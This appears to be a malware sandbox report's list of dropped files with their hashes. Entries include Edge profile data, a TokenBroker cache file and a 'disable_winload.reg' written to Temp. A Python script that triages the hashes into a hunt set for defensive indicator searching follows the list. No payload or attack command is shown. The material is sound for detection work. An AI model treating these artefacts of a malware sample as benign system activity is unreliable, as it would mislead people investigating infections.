C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
  Filesize: 16B
  MD5: 6752a1d65b201c13b62ea44016eb221f
  SHA1: 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
  SHA256: 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
  SHA512: 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
  Filesize: 16B
  MD5: 46295cac801e5d4857d09837238a6394
  SHA1: 44e0fa1b517dbf802b18faf0785eeea6ac51594b
  SHA256: 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
  SHA512: 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
Filesize
16B
MD5
206702161f94c5cd39fadd03f4014d98
SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\LOG
Filesize
198B
MD5
281c4a05c6fc550f6966c77f420d642a
SHA1
e4d5aeb78cba26a2cc7333017f0e626a86ce28ed
SHA256
d8a49db3a6bdb38d97e3b83dcb487b5ff4fb7ed155965a871e2de6cf3341a1f6
SHA512
2cb21293fc60a2d7f67b9d2782bd67f712351e57593f0124e597016c79ba4e6ad97aff86868ef0dbde5006d60cac2a623cc2b0fcb60dca95f5e31c35ef0e08bd
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\MANIFEST-000002
Filesize
50B
MD5
22bf0e81636b1b45051b138f48b3d148
SHA1
56755d203579ab356e5620ce7e85519ad69d614a
SHA256
e292f241daafc3df90f3e2d339c61c6e2787a0d0739aac764e1ea9bb8544ee97
SHA512
a4cf1f5c74e0df85dda8750be9070e24e19b8be15c6f22f0c234ef8423ef9ca3db22ba9ef777d64c33e8fd49fada6fcca26c1a14ba18e8472370533a1c65d8d0
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\heavy_ad_intervention_opt_out.db
Filesize
16KB
MD5
9e02552124890dc7e040ce55841d75a4
SHA1
f4179e9e3c00378fa4ad61c94527602c70aa0ad9
SHA256
7b6e4ce73ddd8b5e7a7c4a94374ac2815d0048a5296879d7659a92ee0b425c77
SHA512
3e10237b1bff73f3bb031f108b8de18f1b3c3396d63dfee8eb2401ce650392b9417143a9ef5234831d8386fc12e232b583dd45eada3f2828b3a0a818123dd5cd
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db
Filesize
44KB
MD5
ccca2994b90655bf2ee1bd25fca169a4
SHA1
ca9c47746d132ed938774d32ec6b41ec8a92dc6f
SHA256
968d1343c07de4330c9ade0ceed37cd1358ae3b70389e3af1661ecef49708e46
SHA512
5f48dc04ba45d71755caf16e488ac1bada4559e80ad60eb6fd14e472a5e8578e10bf257fbb1736e5ffa6e5017d20c530a398e79034fd4feeb5b012dfca66b15d
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\000003.log
Filesize
187B
MD5
554a6e7c521b6a2b4d5591e3d0b4144e
SHA1
8677036506f69e43c850424d36ee1c946c392455
SHA256
14dd0165b47130ab0ca1aedae5b7bb6756868929c1956925107006290c0aaef5
SHA512
dc0140ff62da5471867e82a4c627a00618f9755b4417de18bcf64c3b18d3e20abefab2d5a04d18f67a55083221b0d1c8198dd82fbb7691ce491dfc1feb849ebb
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG
Filesize
322B
MD5
e09b50cb1e647da2d7b07ef5911d4302
SHA1
2d8c5bcfe945edb2903f599d92ac695989014fe1
SHA256
5e5c2ea2adc3d97a374d7c7ec6f14daf8975814e2ab355eefd029256e771b282
SHA512
1332308aa359f217ebdc9e3948fd28f64e647922989f4f99e7c0ba2fe1e29c916281e24994779ce953dc05907a03eb58b89a092ffa59ec27193af1d91763d112
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\000003.log
Filesize
594B
MD5
e8dca28673e03790be4e9dd4bc78349e
SHA1
01052ea3656eed306a447f5f33e9262e6be6cfac
SHA256
d2fabf0423a1afee07464615d4e7b400dd23fe04b8bb52639e53c3ae57ffda10
SHA512
0e7952e12375cba5b7a8e3abf4a879076aca20c9af25e930148b6f611db696fb4003b3d48d5de07b1972685c109c094d39d46ef8442d58ae1177e56285f492da
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG
Filesize
340B
MD5
ca78ff1e381341c74670b20495bf057d
SHA1
75d329f23db5bb7c95222fd5578fcb075d87dbb2
SHA256
14b4fcb4d91e7055d09914cc3bf37f3a48f29e8695f91a1ac8cfd7dd2403b924
SHA512
3f29a2266da632bd1bbf322e5ec1a7d745e3f1182b3b053b770765050cdfe59b08e8f8b11addff236a13d5bbb8c6f77343f1c1abc39f76db518b34d749374a16
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_0
Filesize
44KB
MD5
5a0ab3734ecf3f60527848356e4ed5c8
SHA1
92997031cb781d6cc8328369674947b7ea0c05d3
SHA256
bc6a6690bce150bafeeea150d293b3f112fa8c8106040a0d388aa8d4c6f8ba7f
SHA512
a0fad4f27b16f3d61b9d9f78491f743275ed1ec17f0c2e872bccfec0fb144255943269ba22546269575832c56385f65d663bc020a4c444acdcc601748dccde7e
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_1
Filesize
264KB
MD5
0f763835dc54e95472101be940b66bfb
SHA1
a8708da39d976c369a0b4f1d9b44d98853e2ab1e
SHA256
2cc3a528a09b336ddad629217d7130d222a5f4386554ee6e96636fb6e2ec0a7d
SHA512
ed0430bc43da8deb3ddbf8633f5ccda45e493667ca03be506b1b19bc584583b9e0dc24ab5c96b4e89bf4906bffadff77df9a96dc48e9e79575d3fc56ba0abaea
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_3
Filesize
4.0MB
MD5
20a0586e63839e4314261ca1b9039f2e
SHA1
b39d8fdad6c761ac7ae3c6edd6cfd6c5bb2674ea
SHA256
9fa3b14d1df07cd2198821d9efc9fb169f2818f3971d841d130488adfe455e75
SHA512
243d699f6a64a2ebc9b5e924188364e27abfc3623c02ca214bc2775d12283e9704b669d600039e35cb09ac0f5d3da8ec264e8d5e8ac8b2c3e7d74215f83d04b7
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Last Version
Filesize
11B
MD5
838a7b32aefb618130392bc7d006aa2e
SHA1
5159e0f18c9e68f0e75e2239875aa994847b8290
SHA256
ac3dd2221d90b09b795f1f72e72e4860342a4508fe336c4b822476eb25a55eaa
SHA512
9e350f0565cc726f66146838f9cebaaa38dd01892ffab9a45fe4f72e5be5459c0442e99107293a7c6f2412c71f668242c5e5a502124bc57cbf3b6ad8940cb3e9
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
11KB
MD5
e07f54e4a57316ba329f39ed36ce6cfb
SHA1
f568aa71db240dae23b5607b6fbb42c1d36784ad
SHA256
439142c683d163addad7f33f7976851b431a6e492335c0fea21a8bab58229f06
SHA512
81a44e08244a167f0e53448678eb2cc132e7bdbd5e8ff7735c656b92babdd4e35f7fb4d85d957221071931c903a17e85e7877f7a755c9b98a12e4fd618739e18
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
11KB
MD5
9151c7bc04c89b85c26b6507ebaa3e80
SHA1
4f353f60aa3fd6fea8402d516200125a3a5e00bc
SHA256
fb7679d880b9e783ec3a5888f2acda186c4ec6c68938fd777bc757524958e14b
SHA512
1ef2803677617a33ea932e43b726658c455b769dc4223fee932c4729243e3f121235e8d403798c438f64912925bec305e55e3ae1cf0b9d997fe3fb1ba81cc3c6
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\data_1
Filesize
264KB
MD5
07cfa33bb6443dc294d155e8654ba58d
SHA1
554cf31c71a3812d9311511ef5036ee13ec49d2e
SHA256
9bc4994307fd399a63872ce4aec3baccb1db81514e6ab9aec2f54832704bbab4
SHA512
b7ea1eac2ee7ba8c20d87ee29d540bb0d7bb84a58f9b2b9605e0daeff6610329f11f1fcac5f76b9b9e2c5c2b827aeea04d6c2497a5dee2c73612b05e3e716b6f
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\edge_shutdown_ms.txt
Filesize
4B
MD5
274583a65fe6b9b9874eb891eb0acf17
SHA1
19c068ea4adbdf7bfe8729c603dcf8ba9249dac5
SHA256
817f4787ab03c4377decd864c064ec156a0b3f5dffdc70795908d37a81a556bb
SHA512
249d4ec5e10f0d61965d6ec6da27c0e620b362cae669f92fb203a06e4c0613dc57ce9c623fd4a19deb83cd0a9e5c6b2c7c10b33dd4f8c7e519db5fcca9758286
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\fe88f101-2b76-4dce-9d39-d73c8f4ea499.tmp
Filesize
11KB
MD5
d26e30ee3d815d90e6adad4ae04398fc
SHA1
a55710c35b820eac0642f6f96f143b75e7894689
SHA256
80df4ac0cff475e7ee3fba92440e23f4259b94cef36747b2ff8d47be6ebccdcb
SHA512
abb50ff93d4449bda7906e5dfa2d1ee7cee14559318f54898df52f32b856ad3146f42c06d631e096495e32ff099825f0658f05428be7471ce6d5b92fb15b4605
-
C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\9cd93bc6dcf544bae69531052e64647ec02f2bb4.tbres
Filesize
4KB
MD5
f6ee8af82761e872d702c57668e24162
SHA1
8535700d25715fc0c44186def44dee7528599b65
SHA256
195767e2274244bd4bd619c5fdc71975c7418bc123d3f23471cf9e35a731d370
SHA512
10bf2b2747cf909e9ea7bfb856864e8cef5945ccdb703b36083ac53f9b25c49b51b0e0486dd6d32d9271fa82986360ca18aaf27361dc5d27b69dad7bb8e72eb8
-
C:\Users\Admin\AppData\Local\Temp\disable_winload.reg
Filesize
91B
MD5
47b5ae368c4aff20eafa90ffdcd03a34
SHA1
dff7d41c3d4a68e9e633b671b4a4c7fcb40c8f81
SHA256
aaf7fcebf2aa8e1ebd7bff75c05ab14951a6c7f7a37e9db0a15403cb491b3e07
SHA512
c4b8ad90b868aefea7b95701b1d4a5d6239d0fe452fad25df4fe6c8928c529d99225930d3fe2941b10bd6b07eef05aff9fd443a836638fc4916372d2588c136f
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db
Filesize
1024KB
MD5
b0bcb925d85cd65cc926570d3dfed96e
SHA1
23c123a744528fbd7325a597ebbc7c75e6ea853d
SHA256
cb215908a1c883d3cfb7ed6157d42af6da3a8fcf5993f3f3d582c5f7ec683d23
SHA512
a0037f1ef86a4c2eeef6b19de16d6d71eff35aaff9daedfbc7f8227305d8acc8d36e119c590ef1ca6d3a25e2bbb0b6e91202ec93c1b22e7b961e00e839d8ba94
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db
Filesize
7KB
MD5
a1dfdeb0848c46179d0d882ffe23d376
SHA1
8d52d9199d3bd2b12ba714fcf978eb7e44e46d07
SHA256
aeeeb2061f29f4e7633b58063d231debddb3110fde08ecf97bc25b76dcf491b0
SHA512
aba22cbaeb799cfea34c3a0a9c4a5d6822e40622f52df061097b5e77cc5cb329f75b8c7ae654b8f0944f4fbf2ba2d63f6352693fafb9cd11bb1df3fb249a62aa
-
\??\pipe\LOCAL\crashpad_4988_TIQWTLYHSJVDGSMX
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
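The dropped-file listing above comes out of the report as flat text with the field labels fused onto their values, and not every record is a usable indicator: the crashpad entry is a named pipe with no size whose four digests are exactly those of zero-length input, so they match any empty object and are worthless for hunting. The Python below is an added example, not part of the sandbox report or the sandbox vendor's tooling. It parses records in the fused form the page extraction produced, checks that every digest has the expected length, flags empty-content and sizeless records, and returns only the SHA256 values worth searching for elsewhere. The two sample records are copied verbatim from the listing above (the `disable_winload.reg` file and the crashpad pipe); the `parse_records`, `triage` and `hunt_set` names are this example's own, and it assumes no real path ends in one of the label words.

```python
import hashlib
import re

# Digests of zero-length input. A record carrying all four of these
# describes an empty or unreadable object (a named pipe, for instance),
# not a payload worth adding to a blocklist.
EMPTY_DIGESTS = {
    "MD5": hashlib.md5(b"").hexdigest(),
    "SHA1": hashlib.sha1(b"").hexdigest(),
    "SHA256": hashlib.sha256(b"").hexdigest(),
    "SHA512": hashlib.sha512(b"").hexdigest(),
}

# Expected hex-digit count per algorithm, to catch truncated or mangled values.
DIGEST_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}

LABEL_RE = re.compile(r"^(Filesize|MD5|SHA1|SHA256|SHA512)(.*)$")

# Two records copied from the report listing, in the fused label/value
# form the page extraction produced (constructed test input for this example).
SAMPLE = r"""
C:\Users\Admin\AppData\Local\Temp\disable_winload.regFilesize
91B
MD547b5ae368c4aff20eafa90ffdcd03a34
SHA1dff7d41c3d4a68e9e633b671b4a4c7fcb40c8f81
SHA256aaf7fcebf2aa8e1ebd7bff75c05ab14951a6c7f7a37e9db0a15403cb491b3e07
SHA512c4b8ad90b868aefea7b95701b1d4a5d6239d0fe452fad25df4fe6c8928c529d99225930d3fe2941b10bd6b07eef05aff9fd443a836638fc4916372d2588c136f
-
\??\pipe\LOCAL\crashpad_4988_TIQWTLYHSJVDGSMXMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
"""


def parse_records(text):
    """Split the flattened listing on '-' separators and rebuild each record.

    Handles the three shapes the extraction produces: a label glued to the end
    of the path line, a label glued to its hex value, and a label alone on a
    line with its value on the next line.
    """
    records = []
    for chunk in text.split("\n-\n"):
        lines = [ln.strip() for ln in chunk.strip().splitlines() if ln.strip()]
        if not lines:
            continue
        rec = {"path": lines[0]}
        pending = None  # label whose value sits on the following line
        # Assumption: a label fused onto the path line is never a real path suffix.
        for label in ("Filesize", "MD5", "SHA1", "SHA256", "SHA512"):
            if lines[0].endswith(label):
                rec["path"] = lines[0][: -len(label)]
                pending = label
                break
        for line in lines[1:]:
            if pending is not None:
                rec[pending] = line
                pending = None
                continue
            m = LABEL_RE.match(line)
            if m is None:
                raise ValueError(f"unexpected line in record: {line!r}")
            label, value = m.group(1), m.group(2).strip()
            if value:
                rec[label] = value
            else:
                pending = label
        records.append(rec)
    return records


def triage(rec):
    """Return findings for one record; an empty list means it is a usable IoC."""
    notes = []
    for alg, n in DIGEST_LEN.items():
        val = rec.get(alg)
        if val is None:
            notes.append(f"missing {alg}")
        elif len(val) != n or not re.fullmatch(r"[0-9a-f]+", val):
            notes.append(f"malformed {alg}")
    if all(rec.get(alg) == d for alg, d in EMPTY_DIGESTS.items()):
        notes.append("empty content (zero-length digests)")
    if "Filesize" not in rec:
        notes.append("no size (non-file object such as a pipe)")
    return notes


def hunt_set(records):
    """SHA256 values of records with complete, well-formed, non-empty digests."""
    return {r["SHA256"] for r in records if not triage(r)}


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for r in recs:
        print(r["path"], triage(r) or "ok")
    print("hunt:", sorted(hunt_set(recs)))
```

Run against the two sample records, the `.reg` file dropped in `Temp` comes through clean and is the only SHA256 in the hunt set; the crashpad pipe is rejected both for carrying empty-input digests and for having no size. The same parser takes the whole listing if the fused text is pasted in, separator lines included.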